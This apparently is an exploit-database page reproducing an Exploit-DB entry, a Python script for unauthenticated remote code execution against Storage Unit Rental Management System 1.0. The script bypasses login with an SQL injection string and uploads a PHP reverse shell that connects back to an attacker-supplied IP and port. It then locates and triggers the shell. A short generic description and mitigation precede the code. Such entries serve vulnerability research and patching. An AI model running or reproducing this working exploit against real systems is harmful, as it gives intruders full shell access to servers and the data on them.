header-logo
Suggest Exploit
vendor:
Storage Unit Rental Management System
by:
Fikrat Ghuliev (Ghuliev)
9,8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Storage Unit Rental Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu
2021

Storage Unit Rental Management System 1.0 – Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable Storage Unit Rental Management System 1.0. The attacker can send a malicious request with a crafted payload to the vulnerable application, which will then be executed on the server. The payload is sent as a multipart/form-data request with a filename containing the malicious code.

Mitigation:

The application should be updated to the latest version and all unnecessary features should be disabled. Additionally, the application should be configured to use secure authentication methods and access control mechanisms.
Source

Exploit-DB raw data:

# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
# Version: 1
# Tested on: Ubuntu

import requests
from bs4 import BeautifulSoup
import sys
import random
import string
import time
 
if len(sys.argv) != 4:
    print("[~] Usage : python3 exploit.py localhost ip port")
    exit()
 
site = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"

letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5)) 

def LoginAndShellUpload():
    login = 'http://'+site+':80/storage/classes/Login.php?f=login'
    session = requests.session()
    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
    user_login = session.post(login, data=post_data)
    cookie = session.cookies.get_dict()

    print('[+]Success login')
    print('[+]Try Shell upload')
    time.sleep(2)
    #shell upload
    url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
    cookies = cookie
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
    data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
    requests.post(url, headers=headers, cookies=cookies, data=data)
    print('[+]Success!')
    print('[+]Getting reverse shell')
    time.sleep(2)


def RCE():
    
    path = 'http://'+site+'/storage/uploads/'
    html_text = requests.get(path).text
    soup = BeautifulSoup(html_text, 'html.parser')
    for link in soup.find_all('a'):
        data = link.get('href')
        with open('shell_location.txt', 'w') as f:
            f.write(data)
        
    path2 = 'shell_location.txt'
    shell_file = open(path2,'r')
    shell = shell_file.readline()

    r = requests.get('http://'+site+'/storage/uploads/'+shell)
    print(r.text)
    print('[+]Hacked!')



LoginAndShellUpload()
RCE()

Navigation

Suggest Exploit

Services By CQR